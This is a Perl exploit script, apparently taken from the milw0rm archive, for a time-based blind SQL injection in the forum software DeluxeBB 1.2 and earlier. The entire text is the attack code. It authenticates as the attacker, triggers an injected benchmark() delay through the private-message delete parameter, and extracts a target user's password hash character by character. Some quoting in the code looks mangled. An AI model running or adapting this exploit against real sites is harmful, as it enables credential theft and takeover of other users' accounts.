DeluxeBB <= 1.2 Remote Blind SQL Injection Exploit#!/usr/bin/perl # -------------------------------------------------- # DeluxeBB <= 1.2 Remote Blind SQL Injection Exploit # -------------------------------------------------- # by athos - staker[at]hotmail[dot]it # download on http://deluxebb.com # -------------------------------------------------- # Usage: # perl xpl.pl host/path prefix id password target id # perl xpl.pl localhost/deluxebb deluxebb 5 r00x 1 # -------------------------------------------------- # Note: magic_quotes_gpc off # don't add me on msn messenger # my email staker.38@gmail.com # -------------------------------------------------- # Greetz: str0ke,The:Paradox and #cancer # -------------------------------------------------- use strict; use Digest::MD5('md5_hex'); use LWP::UserAgent; my ($hash,$http); my ($host,$prefix,$user,$pass,$target) = @ARGV; $http = new LWP::UserAgent(timeout => 5); if (@ARGV != 5) { print `\n+----------------------------------------------------+\r`, `\n| DeluxeBB <= 1.2 Remote Blind SQL Injection Exploit |\r`, `\n+----------------------------------------------------+\r`, `\nby athos - staker[at]hotmail[dot]it\n`, `\nUsage + perl $0 [host/path] [prefix] [ID] [password] [target ID]`, `\nHost + localhost/DeluxeBB`, `\nID + your user ID`, `\nPassword + your password`, `\nPrefix + table prefix (default: deluxebb)`, `\nTarget ID + target id\n`; exit; } $http->default_header('Cookie' => cookies($user,$pass)); &exploit; sub getUsername { my ($user_id,$response,@nickname) = $_[0]; $response = $http->get(`http://$host/misc.php?sub=profile&uid=$user_id`); @nickname = $response->as_string =~ m{(.+?)}ig; return $nickname[1]; } sub cookies { my ($username); my ($user_id,$password) = @_; $username = getUsername($user_id); $password = md5_hex($password); return qq{membercookie=$username; memberid=$user_id; memberpw=$password;}; } sub getMsg { my $response = $http->get(`http://$host/pm.php?sub=folder&name=inbox`); if ($response->as_string =~ m/pid=(\d+)./i) { return $1; } else { my $content = { to => getUsername($user), subject => rand(999), posticon => 'none', rte1 => rand(999), submit => 'Send' }; my $request = $http->post(`http://$host/pm.php?sub=newpm`,$content); my $read_id = $http->get(`http://$host/pm.php?sub=folder&name=inbox`); if ($read_id->content =~ /pid=(\d+)./i) { return $1; } } } sub sql { my ($i,$j,$sql) = (shift,shift,undef); $sql = `%27+OR+(SELECT+IF((ASCII(SUBSTRING(pass,$i,1))=$j),`. `benchmark(200000000,CHAR(0)),0)+FROM+${prefix}_users`. `+WHERE uid=$target))%23`; return $sql; } sub delay { my ($tm1,$tm2) = (undef,undef); my ($msg,$sql) = @_; $tm1 = time(); $http->get(`http://$host/pm.php?sub=do&submit=Delete&delete$msg=$sql`); $tm2 = time(); return $tm2 - $tm1; } sub exploit { my ($i,$ord) = (1,undef); my @chr = (48..57, 97..102); for ($i..32) { foreach $ord(@chr) { if (delay(&getMsg,&sql($i,$ord)) >= 5) { syswrite(STDOUT,chr($ord)); $hash .= chr($ord); last; $i++; } if ($i == 2 and not defined $hash) { syswrite(STDOUT,`Exploit Failed!\n`); exit; } } } } # milw0rm.com [2008-12-28]